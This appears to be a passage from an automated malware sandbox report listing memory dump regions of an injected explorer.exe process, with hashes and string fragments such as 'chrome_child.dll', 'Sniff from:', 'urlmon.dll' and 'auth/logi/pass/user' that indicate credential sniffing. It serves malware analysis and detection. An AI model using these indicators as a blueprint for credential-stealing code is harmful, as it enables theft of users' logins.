                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: 5159eb17783c2640193be5fce8c9a01f5525be9d1b0db0f01872f09d353d6aaa
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: 9231027040CB486FD71ADB28D4856EAB3D0FB94300F90492EF49BC7282EE30E54ACB42
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: e256f745742d5b6c764ab5e7291215d3db672a1ff8d427d95b406e9ee5f082a9
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 42317C3411CA084FC784EF699496BAAB7E1FB98300FC0562DA48ECB255DF30D985CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: 5eded90549d0018f5024df5644254a6592336c9fc1f0b87c178f2af75c6e8df8
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: 82318D3411CB084FC784EF699495BAAB7E1FB98300FC0562DA44ACB255CF30D985CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 35f82acd9b039c7d5a5cddd7dde7126c4337156d3e3e3395e5da9488a35cbbef
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: E631D131618A0C8BCB44EFA8D8957EDBBE0FB58215F40022AE44ED7240DE789685CB89
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 201bfba492b8cb01e018e4a0bfb6d07d438baabfe75f9779b3defb418e488e14
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 2B210470618A0C8BCF04EFA8D8957EDBBE0FF58245F80022EE45AD7240DF749685CB89
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction ID: d4a5449a0ed552f46ef57d70eef2a4b7bbc4d6813a214c76c6aa82a6c1d24d8f
                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction Fuzzy Hash: 60217C74A28A0D9BDB48EFA8D0547ADBAF0FF58304F50462EE00DD7600DB74E592CB84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction ID: c3873c9cdac31b020cc67bcc30b5dfe80f97249d3d8754094d839cc24d6d3e35
                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction Fuzzy Hash: 4D217C74A28A0D9BDB48EFA8D0557EDBBF0FB58304F50462EE009D7600DB74E592CB88
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: auth$logi$pass$user
                                            • API String ID: 0-2393853802
                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction ID: 705a86423a3ecb5ae4149cd3069d3e6bcf76d1e92d1698f0d4455bb11be4e3ac
                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction Fuzzy Hash: F221CD30618B0D8BCB46CF9D98916DFB7E1EFC8344F004619E41AEB245D7B0E9558BC2
                                            Uniqueness

                                            Uniqueness Score: -1.00%